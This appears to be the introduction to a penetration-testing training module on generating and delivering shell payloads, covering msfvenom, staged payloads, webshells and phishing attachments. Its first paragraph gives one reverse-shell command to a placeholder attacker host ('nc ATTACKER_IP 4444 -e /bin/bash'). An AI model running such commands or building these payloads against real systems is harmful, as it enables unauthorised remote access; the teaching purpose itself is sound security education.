Shell Payload Generation & Delivery

We've covered catching shells, setting up listeners, stabilising connections, and creating fully interactive TTYs. But there's a gap: how do we get those shells to call home in the first place? Typing nc ATTACKER_IP 4444 -e /bin/bash works when we're already on the box, but real penetration testing requires payloads, self-contained programs that establish shell connections when executed on target systems.

Consider a common scenario: we've found a file upload vulnerability that lets us upload executable files, but we can't directly interact with the system to type shell commands. We need a payload, an executable that, when triggered, automatically connects back to our waiting listener. Or perhaps we've identified a phishing opportunity where we need an innocent-looking attachment that establishes persistent access. Manual shell commands won't work here; we need generated, deployable payloads.

This room bridges that gap between "I can catch shells" and "I can create the payloads that generate those shells". We'll learn to craft payloads for different platforms, delivery methods, and evasion requirements, turning our shell-catching skills into a complete offensive toolkit.

Learning Objectives

• Generate custom shell payloads using msfvenom for multiple platforms and formats
• Understand staged vs stageless payloads and when each is appropriate
• Use Metasploit's multi/handler to catch staged payloads and manage sessions
• Deploy webshells for persistent access through web applications
• Create alternative payloads when standard tools are unavailable or restricted

Learning Prerequisites

• Shells & Listeners Fundamentals
• Metasploit: Meterpreter 
• Web Applications Basics